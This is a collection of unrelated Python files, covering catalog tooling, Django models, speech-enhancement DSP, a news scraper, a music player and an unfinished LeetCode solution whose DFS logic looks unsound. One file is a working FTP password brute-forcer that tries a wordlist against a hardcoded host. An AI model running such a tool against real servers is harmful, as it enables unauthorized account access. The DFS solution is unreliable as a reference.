json.dump(items, catalog_file, indent=2)
def handle_args():
parser = argparse.ArgumentParser(description='Tool for combining catalog files and/or ordering, checking and '
'converting paths within catalog files')
parser.add_argument('--output', help='Write collected catalog items to this new catalog file')
parser.add_argument('--make-relative', action='store_true',
help='Make all path entries of all items relative to new catalog file\'s parent directory')
parser.add_argument('--check',
help='Comma separated list of path entries to check for existence '
'("all" for checking every entry, default: no checks)')
parser.add_argument('--on-miss', default='fail', choices=['fail', 'drop', 'remove', 'ignore'],
help='What to do if a path is not existing: '
'"fail" (exit program), '
'"drop" (drop catalog item) or '
'"remove" (remove path entry from catalog item) or '
'"ignore" (keep it as it is)')
parser.add_argument('--order-by', help='Path entry used for sorting items in target catalog')
parser.add_argument('sources', nargs='+', help='Source catalog files (supporting wildcards)')
return parser.parse_args()
if __name__ == "__main__":
CLI_ARGS = handle_args()
CLI_ARGS.check = [] if CLI_ARGS.check is None else CLI_ARGS.check.split(',')
build_catalog()
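# Example invocation (script and file names are illustrative):
#   python catalog_tool.py --check all --on-miss drop --output combined.json 'data/*.json'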
|
import RPi.GPIO as GPIO
import time
import threading
GPIO.setmode(GPIO.BOARD)
BB = 35
GPIO.setup(BB,GPIO.OUT)
def Scan():
time.sleep(1)
GPIO.output(BB,True)
time.sleep(1)
GPIO.output(BB,False)
code = input()
time.sleep(0.1)
return code
#def GetCode():
# code = input("Code:")
# print(code)
# time.sleep(1)
#thread1 = threading.Thread(target = GetCode,args=())
#thread2 = threading.Thread(target = Scan,args=())
#thread1.start()
#time.sleep(1)
#thread2.start()
#thread1.join()
#thread2.join()
|
# vim: set fileencoding=utf8
"""
SnakePlan Project Models
@author: Mike Crute (mcrute@gmail.com)
@date: July 09, 2010
"""
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from django.db import models as m
from django.db.models import Model
from django.contrib.auth.models import User
DAY = (
(0, 'Sunday'),
(1, 'Monday'),
(2, 'Tuesday'),
(3, 'Wednesday'),
(4, 'Thursday'),
(5, 'Friday'),
(6, 'Saturday'),
)
STATUSES = (
(0, 'Draft'),
(1, 'Started'),
(2, 'Finished'),
(3, 'Delivered'),
(4, 'Accepted'),
(5, 'Rejected'),
)
class Project(Model):
name = m.CharField(max_length=200)
description = m.TextField(blank=True, null=True)
active = m.BooleanField(default=True)
start_date = m.DateField()
iteration_starts = m.IntegerField(choices=DAY, default=0)
iteration_length = m.IntegerField(default=2)
initial_velocity = m.IntegerField(default=10)
velocity_time_period = m.IntegerField(default=3)
current_velocity = m.IntegerField(default=10)
def __unicode__(self):
return self.name
class Iteration(Model):
project = m.ForeignKey(Project)
name = m.CharField(max_length=200, blank=True, null=True)
description = m.TextField(blank=True, null=True)
start_date = m.DateField(blank=True, null=True)
end_date = m.DateField(blank=True, null=True)
    team_strength = m.DecimalField(decimal_places=2, max_digits=3, default=1)  # max_digits must be >= decimal_places
def __unicode__(self):
return self.name
class Story(Model):
class Meta:
verbose_name_plural = 'stories'
project = m.ForeignKey(Project, related_name='stories')
iteration = m.ForeignKey(Iteration, blank=True, null=True)
tracker = m.ForeignKey(User, blank=True, null=True)
customer = m.ForeignKey(User, blank=True, null=True,
related_name='story_customer')
name = m.CharField(max_length=200)
status = m.IntegerField(choices=STATUSES, default=0)
accept_date = m.DateField(blank=True, null=True)
description = m.TextField(blank=True, null=True)
order = m.IntegerField(default=0)
def __unicode__(self):
return self.name
class Release(Story):
release_date = m.DateField()
class Feature(Story):
points = m.IntegerField(blank=True, null=True)
class Bug(Story):
pass
class Task(Model):
story = m.ForeignKey(Story)
name = m.CharField(max_length=200)
completed = m.BooleanField(default=False)
order = m.IntegerField(default=0)
def __unicode__(self):
return self.name
class Comment(Model):
user = m.ForeignKey(User)
story = m.ForeignKey(Story)
post_date = m.DateTimeField(auto_now=True)
comment = m.TextField()
def __unicode__(self):
return self.comment
|
import logging
from eventlet.zipkin import api
__original_handle__ = logging.Logger.handle
def _patched_handle(self, record):
__original_handle__(self, record)
api.put_annotation(record.getMessage())
def patch():
logging.Logger.handle = _patched_handle
def unpatch():
logging.Logger.handle = __original_handle__
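# Usage sketch: patch() monkey-patches logging.Logger.handle so that every log
# record is also recorded as a Zipkin annotation; unpatch() restores the original.
#   patch()
#   logging.getLogger(__name__).info("this message becomes an annotation")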
|
import os
import unittest
from persistence import Persistence
class TestPersistence(unittest.TestCase):
def setUp(self) -> None:
self.path = os.path.dirname(os.path.realpath(__file__))
self.name = "test_file"
self.persistence = Persistence(self.path, self.name)
def tearDown(self) -> None:
os.remove(self.persistence.path())
def test_exists(self) -> None:
self.assertTrue(self.persistence.exists())
def test_path(self) -> None:
expected = f"{self.path}/{self.name}.yaml"
actual = self.persistence.path()
self.assertEqual(expected, actual)
def test_reset(self) -> None:
with open(self.persistence.path(), "w") as f:
f.write("My best joke!")
self.persistence.reset()
with open(self.persistence.path(), "r") as f:
self.assertEqual("---", f.read())
if __name__ == "__main__":
unittest.main()
|
import ftplib
from colorama import Fore, init # for fancy colors, nothing else
# init the console for colors (for Windows)
init()
# hostname or IP address of the FTP server
host = "192.168.1.113"
# username of the FTP server, root as default for linux
user = "test"
# port of FTP, aka 21
port = 21
def is_correct(password):
# initialize the FTP server object
server = ftplib.FTP()
    print("[!] Trying", password)
try:
# tries to connect to FTP server with a timeout of 5
server.connect(host, port, timeout=5)
# login using the credentials (user & password)
server.login(user, password)
except ftplib.error_perm:
# login failed, wrong credentials
return False
    else:
        # correct credentials
        print(f"{Fore.GREEN}[+] Found credentials:", password, Fore.RESET)
        server.quit()  # close the FTP session cleanly
        return True
# read the wordlist of passwords
with open("wordlist.txt") as wordlist_file:
    passwords = wordlist_file.read().split("\n")
print("[+] Passwords to try:", len(passwords))
# iterate over passwords one by one
# if the password is found, break out of the loop
for password in passwords:
if is_correct(password):
break
|
#!/usr/bin/env python
#
# Copyright 2018 Alexandru Catrina
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import wx
class DetailView(object):
def __init__(self, panel):
self.panel = panel
self.current_record = None
def get_record(self):
return self.current_record
def get_sizer(self):
sizer = wx.BoxSizer(wx.HORIZONTAL)
# record details (name, bounce, connection hash)
st_record = wx.StaticBox(self.panel, wx.ID_ANY, "Record details")
sb_record = wx.StaticBoxSizer(st_record, wx.VERTICAL)
sizer.Add(sb_record, 0, wx.EXPAND | wx.ALL, 5)
# connection details (protocol, host, ip, port, user)
st_connection = wx.StaticBox(self.panel, wx.ID_ANY,
"Connection details")
sb_connection = wx.StaticBoxSizer(st_connection, wx.VERTICAL)
sizer.Add(sb_connection, 0, wx.EXPAND | wx.ALL, 5)
# display record name
static = wx.StaticText(self.panel, wx.ID_ANY, "Name:",
size=(100, -1), style=wx.ALIGN_RIGHT)
row = wx.BoxSizer(wx.HORIZONTAL)
row.Add(static)
row.Add((10, 10), proportion=1)
self.detail_record_name = wx.StaticText(
self.panel, wx.ID_ANY, "n/a", size=(200, -1))
row.Add(self.detail_record_name)
sb_record.Add(row, 0, wx.EXPAND | wx.ALL, 2)
# display record hash
static = wx.StaticText(self.panel, wx.ID_ANY, "Hash:",
size=(100, -1), style=wx.ALIGN_RIGHT)
row = wx.BoxSizer(wx.HORIZONTAL)
row.Add(static)
row.Add((10, 10), proportion=1)
self.detail_record_hash = wx.StaticText(
self.panel, wx.ID_ANY, "n/a", size=(200, -1))
row.Add(self.detail_record_hash)
sb_record.Add(row, 0, wx.EXPAND | wx.ALL, 2)
# display record jump
static = wx.StaticText(self.panel, wx.ID_ANY, "Bounce:",
size=(100, -1), style=wx.ALIGN_RIGHT)
row = wx.BoxSizer(wx.HORIZONTAL)
row.Add(static)
row.Add((10, 10), proportion=1)
self.detail_record_jump = wx.StaticText(
self.panel, wx.ID_ANY, "n/a", size=(200, -1))
row.Add(self.detail_record_jump)
sb_record.Add(row, 0, wx.EXPAND | wx.ALL, 2)
# display connection protocol and port
static = wx.StaticText(self.panel, wx.ID_ANY, "Protocol:",
size=(100, -1), style=wx.ALIGN_RIGHT)
row = wx.BoxSizer(wx.HORIZONTAL)
row.Add(static)
row.Add((10, 10), proportion=1)
self.detail_connection_protocol = wx.StaticText(
self.panel, wx.ID_ANY, "n/a", size=(400, -1))
row.Add(self.detail_connection_protocol)
sb_connection.Add(row, 0, wx.EXPAND | wx.ALL, 2)
# display connection host and ip
static = wx.StaticText(self.panel, wx.ID_ANY, "Hostname:",
size=(100, -1), style=wx.ALIGN_RIGHT)
row = wx.BoxSizer(wx.HORIZONTAL)
row.Add(static)
row.Add((10, 10), proportion=1)
self.detail_connection_hostname = wx.StaticText(
self.panel, wx.ID_ANY, "n/a", size=(400, -1))
row.Add(self.detail_connection_hostname)
sb_connection.Add(row, 0, wx.EXPAND | wx.ALL, 2)
# display connection username
static = wx.StaticText(self.panel, wx.ID_ANY, "Username:",
size=(100, -1), style=wx.ALIGN_RIGHT)
row = wx.BoxSizer(wx.HORIZONTAL)
row.Add(static)
row.Add((10, 10), proportion=1)
self.detail_connection_username = wx.StaticText(
self.panel, wx.ID_ANY, "n/a", size=(400, -1))
row.Add(self.detail_connection_username)
sb_connection.Add(row, 0, wx.EXPAND | wx.ALL, 2)
return sizer
def update(self, record):
self.detail_record_name.SetLabel(record.name)
self.detail_record_hash.SetLabel(record.auth_signature)
self.detail_record_jump.SetLabel(record.jump_signature)
self.detail_connection_username.SetLabel(record.user)
hostname = "%s (%s)" % (record.host, record.ipv4)
self.detail_connection_hostname.SetLabel(hostname)
protocol = "%s (%s)" % (record.scheme, record.port)
self.detail_connection_protocol.SetLabel(protocol)
self.current_record = record
|
# Class Enhancement
from scipy.signal import lfilter
from spectrum import pmtm
from Universal import *
from VAD import *
class Enhancement:
def simplesubspec(self, signal, wlen, inc, NIS, a, b):
"""
simple spectrum subtraction
:param signal: noisy speech
:param wlen: window length
:param inc: frame shift
:param NIS: leading noise segment length
:param a: over subtraction factor
:param b: gain factor
        :return output: denoised speech
"""
wnd = np.hamming(wlen) # window function
N = len(signal) # signal length
speech = Speech()
y = speech.enframe(signal, list(wnd), inc).T # enframe
fn = y.shape[1] # frame number
y_fft = np.fft.fft(y, axis=0) # FFT
y_a = np.abs(y_fft) # amplitude
y_phase = np.angle(y_fft) # phase
y_a2 = y_a ** 2 # energy
Nt = np.mean(y_a2[:, 0: NIS], 1) # average energy in noise segment
        nl2 = int(wlen / 2) + 1  # positive-frequency bin count
temp = np.zeros(nl2) # energy
U = np.zeros(nl2) # one frame amplitude
X = np.zeros((nl2, fn)) # amplitude
for i in range(fn): # spectrum subtraction
for k in range(nl2):
if (y_a2[k, i] > a * Nt[k]):
temp[k] = y_a2[k, i] - a * Nt[k]
else:
temp[k] = b * y_a2[k, i]
U[k] = np.sqrt(temp[k])
X[:, i] = U
output = speech.OverlapAdd2(X, y_phase[0:nl2, :], wlen, inc) # synthesis
        Nout = len(output)  # output length may differ slightly from the original N
if Nout > N:
output = output[0: N]
else:
output = np.concatenate([output, np.zeros(N - Nout)])
output = output / np.max(np.abs(output)) # normalization
return output
    def segment(self, signal, W=256, SP=0.4, Window=np.hamming(256)):
        """
        chops a signal into overlapping windowed segments
        :param signal: one-dimensional signal
        :param W: sample number per window (default = 256)
        :param SP: shift percent (default = 0.4)
        :param Window: window function (default: hamming)
        :return Seg: segment matrix
        """
        if (W != 256):
            Window = np.hamming(W)
        Window = Window.reshape(-1, 1)  # make it a column vector
        L = len(signal)
        SP = int(W * SP)
        N = int((L - W) / SP + 1)  # number of segments
Index = np.tile(np.arange(0, W), (N, 1)) + np.tile(SP * np.arange(0, N).reshape(-1, 1), (1, W))
Index = Index.T
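        # e.g. W=4, SP=0.4 -> shift int(4*0.4)=1, L=6 -> N=3 segments; the
        # columns of Index are [0..3], [1..4], [2..5] (one column per segment)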
hw = np.tile(Window, (1, N))
        Seg = signal[Index] * hw
return Seg
def SSBoll79(self, signal, fs, IS=None):
"""
Spectral Subtraction based on Boll 79. Amplitude spectral subtraction
Includes Magnitude Averaging and Residual noise Reduction
:param signal: noisy signal
:param fs: sampling frequency
:param IS: initial silence (noise only) length in seconds (default value is .25 sec)
        :return output: denoised signal
"""
        if not IS:
            IS = 0.25  # seconds
        # default analysis parameters (may be overridden by a dict IS below)
        W = int(0.025 * fs)  # window length 25ms
        nfft = W
        # overlap-add method works well with this shift value
        SP = 0.4  # frame shift 40% (10ms)
        wnd = np.hamming(W)
# IGNORE THIS SECTION FOR COMPATIBILITY WITH ANOTHER PROGRAM FROM HERE.....
if isinstance(IS, dict):
W = IS['windowsize']
SP = IS['shiftsize'] / W
nfft = IS['nfft']
wnd = IS['window']
            if 'IS' in IS:  # hasattr() does not check dict keys
                IS = IS['IS']
            else:
                IS = 0.25
        # .......IGNORE THIS SECTION FOR COMPATIBILITY WITH ANOTHER PROGRAM TO HERE
NIS = int((IS * fs - W) / (SP * W) + 1) # number of initial silence segments
Gamma = 1 # 1: magnitude, 2: power spectrum
y = self.segment(signal, W, SP, wnd)
Y = np.fft.fft(y, axis=0)
FreqResol, NumberofFrames = Y.shape
YPhase = np.angle(Y[0: int(NumberofFrames / 2) + 1, :]) # noisy speech phase
Y = np.abs(Y[0: int(NumberofFrames / 2) + 1, :]) ** Gamma # Spectrogram
N = np.mean(Y[:, 0:NIS].T, axis=0).T # initial noise power spectrum mean
NRM = np.zeros(N.shape) # Noise Residual Maximum (Initialization)
NoiseCounter = 0
NoiseLength = 9 # smoothing factor for noise updating
Beta = 0.03
        YS = Y.copy()  # magnitude-averaged copy (avoid modifying Y in place)
for i in np.arange(1, NumberofFrames - 1):
YS[:, i] = (YS[:, i - 1] + YS[:, i] + YS[:, i + 1]) / 3
X = np.zeros(Y.shape)
D = np.zeros(FreqResol)
for i in range(NumberofFrames):
# Magnitude Spectrum Distance VAD
NoiseFlag, SpeechFlag, NoiseCounter, Dist = VAD().vad(Y[:, i] ** (1 / Gamma), N ** (1 / Gamma),
NoiseCounter)
if SpeechFlag == 0:
N = (NoiseLength * N + Y[:, i]) / (NoiseLength + 1) # update and smooth noise
NRM = np.maximum(NRM, YS[:, i] - N) # update maximum noise residue
X[:, i] = Beta * Y[:, i]
else:
D = YS[:, i] - N # spectral subtraction
if i > 0 and i < NumberofFrames - 1: # residual noise reduction
for j in range(len(D)):
if D[j] < NRM[j]:
D[j] = np.min(np.array([D[j], YS[j, i - 1] - N[j], YS[j, i + 1] - N[j]]))
D[D < 0] = 0
X[:, i] = D
output = Speech().OverlapAdd2(X ** (1 / Gamma), YPhase, int(W), int(SP * W))
return output
def SSBoll79_2(self, signal, fs, T1, IS=None):
"""
Spectral Subtraction based on Boll 79. Amplitude spectral subtraction
Includes Magnitude Averaging and Residual noise Reduction
:param signal: noisy signal
:param fs: sampling frequency
        :param T1: threshold for the VAD (pitch_vad1)
        :param IS: initial silence (noise only) length in seconds (default value is .25 sec)
        :return output: denoised signal
"""
        if not IS:
            IS = 0.25  # seconds
        # default analysis parameters (may be overridden by a dict IS below)
        W = int(0.025 * fs)  # window length 25ms
        nfft = W
        # overlap-add method works well with this shift value
        SP = 0.4  # frame shift 40% (10ms)
        wnd = np.hamming(W)
# IGNORE THIS SECTION FOR COMPATIBILITY WITH ANOTHER PROGRAM FROM HERE.....
if isinstance(IS, dict):
W = IS['windowsize']
SP = IS['shiftsize'] / W
nfft = IS['nfft']
wnd = IS['window']
            if 'IS' in IS:  # hasattr() does not check dict keys
                IS = IS['IS']
            else:
                IS = 0.25
        # .......IGNORE THIS SECTION FOR COMPATIBILITY WITH ANOTHER PROGRAM TO HERE
NIS = int((IS * fs - W) / (SP * W) + 1) # number of initial silence segments
Gamma = 1 # 1: magnitude, 2: power spectrum
y = self.segment(signal, W, SP, wnd)
Y = np.fft.fft(y, axis=0)
FreqResol, NumberofFrames = Y.shape
YPhase = np.angle(Y[0: int(NumberofFrames / 2) + 1, :]) # noisy speech phase
Y = np.abs(Y[0: int(NumberofFrames / 2) + 1, :]) ** Gamma # Spectrogram
N = np.mean(Y[:, 0:NIS].T, axis=0).T # initial noise power spectrum mean
NRM = np.zeros(N.shape) # Noise Residual Maximum (Initialization)
NoiseCounter = 0
NoiseLength = 9 # smoothing factor for noise updating
Beta = 0.03
fn = NumberofFrames
miniL = 5
voiceseg, vosl, SF, Ef = VAD().pitch_vad1(y, fn, T1, miniL)
        YS = Y.copy()  # magnitude-averaged copy (avoid modifying Y in place)
for i in np.arange(1, NumberofFrames - 1):
YS[:, i] = (YS[:, i - 1] + YS[:, i] + YS[:, i + 1]) / 3
X = np.zeros(Y.shape)
D = np.zeros(FreqResol)
for i in range(NumberofFrames):
# Magnitude Spectrum Distance VAD
NoiseFlag, SpeechFlag, NoiseCounter, Dist = VAD().vad(Y[:, i] ** (1 / Gamma), N ** (1 / Gamma),
NoiseCounter)
SpeechFlag = SF[i]
if SpeechFlag == 0:
N = (NoiseLength * N + Y[:, i]) / (NoiseLength + 1) # update and smooth noise
NRM = np.maximum(NRM, YS[:, i] - N) # update maximum noise residue
X[:, i] = Beta * Y[:, i]
else:
D = YS[:, i] - N # spectral subtraction
if i > 0 and i < NumberofFrames - 1: # residual noise reduction
for j in range(len(D)):
if D[j] < NRM[j]:
D[j] = np.min(np.array([D[j], YS[j, i - 1] - N[j], YS[j, i + 1] - N[j]]))
D[D < 0] = 0
X[:, i] = D
output = Speech().OverlapAdd2(X ** (1 / Gamma), YPhase, int(W), int(SP * W))
output = output / np.max(np.abs(output)) # normalized
return output
def Mtmpsd_ssb(self, signal, wlen, inc, NIS, alpha, beta, c):
"""
Spectral Subtraction
Multitaper Spectrum Estimation
Short-term Energy Entropy Ratio
:param signal: noisy speech
:param wlen: frame length
:param inc: frame shift
        :param NIS: leading unvoiced (noise) frame number
:param alpha: over subtraction factor in spectral subtraction
:param beta: gain compensation factor
:param c: gain factor (0: power spectrum, 1: amplitude spectrum)
        :return output: denoised speech
"""
w2 = int(wlen / 2) + 1
wind = np.hamming(wlen) # hamming window
y = Speech().enframe(signal, list(wind), inc).T # enframe
fn = y.shape[1] # frame number
N = len(signal) # signal length
fft_frame = np.fft.fft(y, axis=0) # FFT
abs_frame = np.abs(fft_frame[0: w2, :]) # positive frequency amplitude
ang_frame = np.angle(fft_frame[0: w2, :]) # positive frequency phase
# smoothing in 3 neighbour frame
        abs_frame_backup = abs_frame.copy()  # copy to avoid aliasing during smoothing
for i in range(1, fn - 1, 2):
abs_frame_backup[:, i] = 0.25 * abs_frame[:, i - 1] + 0.5 * abs_frame[:, i] + 0.25 * abs_frame[:, i + 1]
abs_frame = abs_frame_backup
# multitaper spectrum estimation power spectrum
PSDFrame = np.zeros((w2, fn)) # PSD in each frame
for i in range(fn):
# PSDFrame[:, i] = pmtm(y[:, i], NW = 3, NFFT=wlen)
Sk_complex, weights, eigenvalues = pmtm(y[:, i], NW=3, NFFT=wlen)
Sk = (np.abs(Sk_complex) ** 2).transpose()
PSDTwoSide = np.mean(Sk * weights, axis=1)
PSDFrame[:, i] = PSDTwoSide[0: w2]
        PSDFrameBackup = PSDFrame.copy()  # copy to avoid aliasing during smoothing
for i in range(1, fn - 1, 2):
PSDFrameBackup[:, i] = 0.25 * PSDFrame[:, i - 1] + 0.5 * PSDFrame[:, i] + 0.25 * PSDFrame[:, i + 1]
PSDFrame = PSDFrameBackup
# average PSD of leading unvoiced segment
NoisePSD = np.mean(PSDFrame[:, 0: NIS], axis=1)
# spectral subtraction -> gain factor
g = np.zeros((w2, fn)) # gain factor
g_n = np.zeros((w2, fn))
for k in range(fn):
g[:, k] = (PSDFrame[:, k] - alpha * NoisePSD) / PSDFrame[:, k]
g_n[:, k] = beta * NoisePSD / PSDFrame[:, k]
gix = np.where(g[:, k] < 0)
g[gix, k] = g_n[gix, k]
gf = g
if c == 0:
g = gf
else:
g = np.sqrt(gf)
SubFrame = g * abs_frame # spectral subtraction amplitude
output = Speech().OverlapAdd2(SubFrame, ang_frame, wlen, inc) # synthesis
output = output / np.max(np.abs(output)) # normalized
ol = len(output)
if ol < N:
output = np.concatenate((output, np.zeros(N - ol)))
return output
def WienerScalart96m_2(self, signal, fs, T1, IS):
"""
Wiener filter based on tracking a priori SNR usingDecision-Directed
method, proposed by Scalart et al 96. In this method it is assumed that
SNRpost=SNRprior +1. based on this the Wiener Filter can be adapted to a
model like Ephraims model in which we have a gain function which is a
function of a priori SNR and a priori SNR is being tracked using Decision
Directed method.
:param signal: noisy signal
:param fs: sampling frequency
:param IS: initial silence (noise only) length in seconds (default value is .25 sec)
:param T1: threshold
:return output: denoise signal
"""
        if not IS:
            IS = 0.25  # seconds
        # default analysis parameters (may be overridden by a dict IS below)
        W = int(0.025 * fs)  # window length 25ms
        nfft = W
        # overlap-add method works well with this shift value
        SP = 0.4  # frame shift 40% (10ms)
        wnd = np.hamming(W)
# IGNORE THIS SECTION FOR COMPATIBILITY WITH ANOTHER PROGRAM FROM HERE.....
if isinstance(IS, dict):
W = IS['windowsize']
SP = IS['shiftsize'] / W
nfft = IS['nfft']
wnd = IS['window']
            if 'IS' in IS:  # hasattr() does not check dict keys
                IS = IS['IS']
            else:
                IS = 0.25
        # .......IGNORE THIS SECTION FOR COMPATIBILITY WITH ANOTHER PROGRAM TO HERE
pre_emph = 0 # pre_emphasis parameter
signal = lfilter(np.array([1, -1 * pre_emph]), 1, signal) # pre-emphasis
NIS = int((IS * fs - W) / (SP * W) + 1) # number of initial silence segments
y = self.segment(signal, W, SP, wnd) # enframe
Y = np.fft.fft(y, axis=0) # FFT
FreqResol, NumberofFrames = Y.shape
YPhase = np.angle(Y[0: int(NumberofFrames / 2) + 1, :]) # noisy speech phase
Y = np.abs(Y[0: int(NumberofFrames / 2) + 1, :]) # Spectrogram
        LambdaD = np.mean(Y[:, 0: NIS] ** 2, axis=1)  # initial per-bin noise power spectrum variance
N = np.mean(Y[:, 0:NIS].T, axis=0).T # initial average noise power spectrum
alpha = 0.99
fn = NumberofFrames
miniL = 5
voiceseg, vosl, SF, Ef = VAD().pitch_vad1(y, fn, T1, miniL) # vad
NoiseCounter = 0
NoiseLength = 9 # smoothing factor for noise updating
G = np.ones(N.shape) # power estimation initialization
Gamma = G
X = np.zeros(Y.shape) # Y magnitude average
for i in np.arange(1, NumberofFrames - 1):
SpeechFlag = SF[i]
if i <= NIS: # leading unvoiced segment
SpeechFlag = 0
NoiseCounter = 100
if SpeechFlag == 0: # update noise spectrum in unvoiced segment
N = (NoiseLength * N + Y[:, i])/(NoiseLength + 1)
LambdaD = (NoiseLength * LambdaD + Y[:, i] ** 2)/(NoiseLength + 1) # update and smoothing noise variance
gammaNew = (Y[:, i] ** 2)/LambdaD # post SNR
            xi = alpha * (G ** 2) * Gamma + (1 - alpha) * np.maximum(gammaNew - 1, 0)  # a priori SNR (np.max would treat 0 as an axis)
Gamma = gammaNew
G = (xi/(xi + 1)) # wiener spectrum estimation
X[:, i] = G * Y[:, i] # wiener filter spectrum
output = Speech().OverlapAdd2(X, YPhase, int(W), int(SP * W))
output = lfilter([1], np.array([1, -1 * pre_emph]), output)
output = output / np.max(np.abs(output)) # normalized
return output
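# Minimal usage sketch (illustrative; `x` is a 1-D noisy signal at sampling
# rate `fs`, and Speech/VAD come from the Universal/VAD modules imported above):
#   enhancer = Enhancement()
#   denoised = enhancer.SSBoll79(x, fs, IS=0.25)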
|
from bs4 import BeautifulSoup as web
from basic_parser import Parser
class Kommersant_parser(Parser):
def __init__(self):
super().__init__("http://www.kommersant.ru/RSS/news.xml")
self.encoding = "windows-1251"
self.site_encoding = "windows-1251"
def grab(self, url):
content = web(self.get_content(url, self.site_encoding), "html.parser")
obj = {}
if content.select(".article_name"):
obj["title"] = content.select(".article_name")[0].text
if content.select(".article_text_wrapper > p"):
obj["content"] = list(
map(
lambda x: x.text,
content.select(".article_text_wrapper > p")
)
)
return obj
if __name__ == "__main__":
kom = Kommersant_parser()
news = kom.news()
print(news)
url = news[0]["link"]
title = news[0]["title"]
print(title, url)
data = kom.grab(url)
print(data)
|
#!/usr/bin/env python2
from argparse import ArgumentParser
from markovmusic.player import Player
parser = ArgumentParser()
parser.add_argument('--input',
default='input/bach', metavar='PATH',
help='MIDI input, either a single file or a directory')
parser.add_argument('--chain-len',
type=int, default=4, metavar='LENGTH',
help='Length of Markov chains to generate')
parser.add_argument('--time-scale', metavar='SCALE',
type=int, default=1,
help='Temporal scale')
parser.add_argument('--port',
default=None, metavar='NAME',
help='Output MIDI port name')
parser.add_argument('--list-ports',
action='store_true',
help='List available MIDI ports')
player = Player(parser.parse_args())
player.run()
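# Example invocation (script and port names are illustrative):
#   python play.py --input input/bach --chain-len 4 --list-ports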
|
import numpy as np
import pandas as pd
from .utils_complexity_embedding import complexity_embedding
def fisher_information(signal, delay=1, dimension=2):
"""**Fisher Information (FI)**
The Fisher information was introduced by R. A. Fisher in 1925, as a measure of "intrinsic
accuracy" in statistical estimation theory. It is central to many statistical fields far beyond
that of complexity theory. It measures the amount of information that an observable random
variable carries about an unknown parameter. In complexity analysis, the amount of information
that a system carries "about itself" is measured. Similarly to :func:`SVDEn <entropy_svd>`, it
is based on the Singular Value Decomposition (SVD) of the :func:`time-delay embedded <complexity_embedding>`
    signal. The value of FI is usually anti-correlated with other measures of complexity (the more
    information a system withholds about itself, the more predictable and, thus, the less complex
    it is).
See Also
--------
entropy_svd, information_mutual, complexity_embedding, complexity_delay, complexity_dimension
Parameters
----------
signal : Union[list, np.array, pd.Series]
The signal (i.e., a time series) in the form of a vector of values.
delay : int
Time delay (often denoted *Tau* :math:`\\tau`, sometimes referred to as *lag*) in samples.
See :func:`complexity_delay` to estimate the optimal value for this parameter.
dimension : int
Embedding Dimension (*m*, sometimes referred to as *d* or *order*). See
:func:`complexity_dimension` to estimate the optimal value for this parameter.
Returns
-------
fi : float
The computed fisher information measure.
info : dict
A dictionary containing additional information regarding the parameters used
to compute fisher information.
Examples
----------
.. ipython:: python
import neurokit2 as nk
signal = nk.signal_simulate(duration=2, frequency=5)
fi, info = nk.fisher_information(signal, delay=10, dimension=3)
fi
"""
# Sanity checks
if isinstance(signal, (np.ndarray, pd.DataFrame)) and signal.ndim > 1:
raise ValueError(
"Multidimensional inputs (e.g., matrices or multichannel data) are not supported yet."
)
embedded = complexity_embedding(signal, delay=delay, dimension=dimension)
W = np.linalg.svd(embedded, compute_uv=False)
W /= np.sum(W) # normalize singular values
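    # Fisher information of the normalized singular spectrum:
    # FI = sum_i (sigma_{i+1} - sigma_i)^2 / sigma_i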
FI_v = (W[1:] - W[:-1]) ** 2 / W[:-1]
return np.sum(FI_v), {"Dimension": dimension, "Delay": delay, "Values": FI_v}
|
'''
Path with Maximum Gold
You are going to mine a gold mine. Surveyors have mapped out the resource
distribution of the mine in an m * n grid `grid`.
The integer in each cell is the amount of gold in that cell; an empty cell is 0.
To maximize profit, the miner collects gold under the following rules:
Every time the miner enters a cell, they collect all the gold in that cell.
From the current position, the miner can move one step up, down, left or right.
Each cell may be mined (entered) at most once.
Cells with 0 gold must not be mined (entered).
The miner may start from, or stop at, any cell in the grid that contains gold.
Example 1:
Input: grid = [[0,6,0],[5,8,7],[0,9,0]]
Output: 24
Explanation:
[[0,6,0],
[5,8,7],
[0,9,0]]
One route that collects the most gold: 9 -> 8 -> 7.
Example 2:
Input: grid = [[1,0,7],[2,0,6],[3,4,5],[0,3,0],[9,0,20]]
Output: 28
Explanation:
[[1,0,7],
[2,0,6],
[3,4,5],
[0,3,0],
[9,0,20]]
One route that collects the most gold: 1 -> 2 -> 3 -> 4 -> 5 -> 6 -> 7.
Constraints:
1 <= grid.length, grid[i].length <= 15
0 <= grid[i][j] <= 100
At most 25 cells contain gold.
'''
from typing import List
'''
Approach: DFS
Start a DFS from every cell that contains gold and explore all routes. For each
cell keep the two largest branch sums (since cells cannot be revisited, a route
passing through a cell can combine at most its two best disjoint branches).
Time complexity: O(m*n*m*n)
Space complexity: O(m*n)
TODO
'''
class Solution:
def getMaximumGold(self, grid: List[List[int]]) -> int:
m, n = len(grid), len(grid[0])
directs = [(-1, 0), (0, -1), (1, 0), (0, 1)]
maxGold = 0
def dfs(i, j, visited):
nonlocal maxGold
visited[i][j] = True
path1 = 0
path2 = 0
for a, b in directs:
x, y = a + i, b + j
if 0 <= x < m and 0 <= y < n and grid[x][y] > 0 and not visited[x][y]:
g = dfs(x, y, visited)
if g > path1:
path2 = path1
path1 = g
elif g > path2:
path2 = g
maxGold = max(maxGold, grid[i][j] + path1 + path2)
return grid[i][j] + path1
for i in range(m):
for j in range(n):
visited = [[False] * n for _ in range(m)]
if grid[i][j]:
